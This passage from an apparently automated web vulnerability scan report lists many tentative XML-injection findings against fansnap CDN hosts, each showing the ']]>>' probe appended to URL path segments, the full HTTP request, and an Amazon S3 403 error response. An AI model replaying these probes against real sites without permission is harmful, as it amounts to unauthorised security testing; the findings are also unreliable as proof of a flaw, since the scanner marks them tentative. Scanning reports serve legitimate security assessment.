The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/logos/provider-medium-compact-664.gif]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: A550A1622B33B69F
x-amz-id-2: iR+ya+/D1tqOeU2Abz47Y4C83CQWoxGy5k1zRoIDVsPADfoWV0LCekDacTDULbMR
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 6b25503156d951bc2493678d3bcb2c75ffcf9f0b80d300e045a397060fbfd97e564ac324e9ee9b93
Via: 1.0 2fa8d070c031e7b04698c494d003c248.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>A550A1622B33B69F</RequestId><HostId>iR+ya+/D1tqOeU2Abz47Y4C83CQWoxGy5k1zRoIDVsPADfoWV0
...[SNIP]...

8.81. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/javascripts/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 5812A0C13D9CA5E0
x-amz-id-2: NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTvSAvCh6vAp2AnPy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:55 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 43bbfbc07383a786c5681b750f8f2e290f5718cef3aa937ab20ecb1c6854fef3bd1d3f95430cc56c
Via: 1.0 d14fd6248e8744adca7a99428b205190.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>5812A0C13D9CA5E0</RequestId><HostId>NWTrds6K3TJ/14stTtKIx0Yw3vRc6xxKgag2BzN9VbAtZsSJTv
...[SNIP]...

8.82. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts]]>>/bundlegz.js?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BA86D911F46F4716
x-amz-id-2: uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3zLnIYILHbxWb/C
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:58 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 970662699f85924f2c2c29486e589b66b0adf4165a5271b04ec761db3013e12c4fb9b541da4eb13f
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BA86D911F46F4716</RequestId><HostId>uM7o1MqwtNjGBgUuH5aBArq+UOZh6+SQ7SL/0/LncP4bfyU+e3
...[SNIP]...

8.83. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/javascripts/bundlegz.js]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 97A429F94A9FD51A
x-amz-id-2: qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHSU0M9PfzUekVSE+
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:35:00 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: e29dabf9fe8ed4f42c7246d8dee7887e37e2997b5215158cd6b98e25095287d49c94668efd7fb1f4
Via: 1.0 86d80ac95b68b3ed6f674f76ea3510aa.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>97A429F94A9FD51A</RequestId><HostId>qR0nBFJ2wPl+JPBirdM+od9ZvSHvphhn8sd5s1iGf0RjMDptHS
...[SNIP]...

8.84. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/stylesheets/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 9CB3E9864B675FF5
x-amz-id-2: m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHtXqQYi4B63yrzFi
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:48 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 0184ee5e1681cafc9cbbef83048f5d1bdd8441441311fd4fc3e5c937af7c98c28da302261f0772fd
Via: 1.0 c6e272614e0cac48002ff4e64c11f3a7.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>9CB3E9864B675FF5</RequestId><HostId>m8Uux72IM4rQ5naNsakyRM4XhENDMfhqAQjJ2VI0uMLUE8NCHt
...[SNIP]...

8.85. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets]]>>/css/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 03933044C122185D
x-amz-id-2: cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9/OU4aBC1elNPDy
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:50 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f60ef12403b58d644a462fdf49f78d9ec010b0309156838569b751992bb44af68fe78db2b9e3de5c
Via: 1.0 d5ba42a2d3d506b64c73b6035a0a9f60.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>03933044C122185D</RequestId><HostId>cT/NoR4xlkynElCymvvFl0a4VUGBd4oF3IrKUVfwO6JR6tLns9
...[SNIP]...

8.86. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css]]>>/style-bg-defaultgz.css?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6F9EC97154F9BC8E
x-amz-id-2: 4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5PZGbjFEw9N9ay+r
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:53 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 1c2ccb5ea4283fc00e76ebc438bb7b37d045c25c493ed985082a16cec092b21b6884b2ec592fb94d
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6F9EC97154F9BC8E</RequestId><HostId>4mHS7XhhBdeGieXzRj2zE4cY4s68G7kblFgw9g7quojDg+Ia5P
...[SNIP]...

8.87. http://cdn-1.f6img.com/REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-1.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/stylesheets/css/style-bg-defaultgz.css]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-1.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: BD7EBEB28E2DF68E
x-amz-id-2: KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV8H6pc3LZh3vE9w
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:54 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 028b40a4dcd5adb8f48534e8f2deb55c798e3d1a35c9dfa49d027696b4bddfce2033fb5e1b15fadf
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 c1835ed5f58f5752820118219163da2f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>BD7EBEB28E2DF68E</RequestId><HostId>KtWfIZEPdT56EAXFT4WObEJYZfJrOnzfL75M6IbnbYo5WYmXoV
...[SNIP]...

8.88. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 41D9184ED71E08A9
x-amz-id-2: HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzOZwT+qvrEi9mDAj
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:43 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 8eec58003985f09f838e15b608e2711c8e8eaebb2ff60ad96113e274ab0d1bc7cef2fc7661b4cf79
Via: 1.0 9137d054c423ede4794f3621c7d50adb.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>41D9184ED71E08A9</RequestId><HostId>HnD65mzAS9twyAyBikfpVUenTe7VIoH86jHrtY7t9ZpZWm3VzO
...[SNIP]...

8.89. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/cancel.png?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: E29750E108656AE1
x-amz-id-2: DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQvCVG+uf+mljqaa
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:45 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: f918d877098e0239bdcda8f63a940bbeb63aa5e47e4ef31f00376e1109e02ca2f86039f09300cb58
Via: 1.0 01c55e7d09985466997a27ccf9169a1f.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>E29750E108656AE1</RequestId><HostId>DTaJ3wj7Wy28Ro62n9sTs63OcgLpzU6trKqC6kcoTjrLVTNEoQ
...[SNIP]...

8.90. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/cancel.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/cancel.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/cancel.png]]>>?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 4CD105DAD25FB802
x-amz-id-2: vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySVzLSdweB8x+21dl
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:49 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 69bfd2d02b0af504f95bc0b27bfca12969070f3ec4f3686b25a03d907a2febb50d5e173dc3227f0f
Via: 1.0 6759d8ab0529fa24d1eab1639129a687.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>4CD105DAD25FB802</RequestId><HostId>vS8Ma4M50MA1q8WYGumrMEa/SsBj/Bkvi7f/Bx0Lne2HiijySV
...[SNIP]...

8.91. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787]]>>/images/fstron/fstron3.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6F78490DB9BCE2D8
x-amz-id-2: Yh146A2FU4MKF5M8GcTAWd4AvgC3xgtbi7ymu29U1KXIZ55s1DWCsIdUJ+T2hGuD
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:52 GMT
Server: AmazonS3
Age: 1
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 7135abb9931300ffd2576466b0d0f2205ea07d7edc4f5ef7316c52bdf810a7d0637c7b207d40cb88
Via: 1.0 b211469d843c22c59dc668f60ed60542.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6F78490DB9BCE2D8</RequestId><HostId>Yh146A2FU4MKF5M8GcTAWd4AvgC3xgtbi7ymu29U1KXIZ55s1D
...[SNIP]...

8.92. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images]]>>/fstron/fstron3.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 6B8C0EA1E6FB26AD
x-amz-id-2: FTFJVs++RcyY2Wzof1UgDVTUPrXqTdjTpOdK0F00LO/8AOEuJfZhTzP9OuvW52Ki
Content-Type: application/xml
Date: Tue, 19 Jul 2011 18:34:56 GMT
Server: AmazonS3
Content-Length: 231
X-Cache: Error from cloudfront
X-Amz-Cf-Id: 728376edffb0a57f22a1e936bdd86fb61f17aa54b30b8401307a7bc59b7313cd661e0fde5fbee89a
Via: 1.0 557f58686e107bfa2925cf3d6a17c717.cloudfront.net:11180 (CloudFront), 1.0 eadedd3fe9e82c51cc035044b3a5f3fa.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<Error><Code>AccessDenied</Code><Message>Access Denied</Message><RequestId>6B8C0EA1E6FB26AD</RequestId><HostId>FTFJVs++RcyY2Wzof1UgDVTUPrXqTdjTpOdK0F00LO/8AOEuJf
...[SNIP]...

8.93. http://cdn-2.f6img.com/REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://cdn-2.f6img.com
Path:   /REL-fansnap-1.20.2-r31787/images/fstron/fstron3.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /REL-fansnap-1.20.2-r31787/images/fstron]]>>/fstron3.gif?REL-fansnap-1.20.2-r31787 HTTP/1.1
Host: cdn-2.f6img.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/u2-tickets/u2-with-interpol-rescheduled-from-719/july-20-2011-389669?utm_source=1987&ack=http%3a%2f%2fwww.bing.com%2fs%2fack.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
x-amz-request-id: 390F74F86C68625C
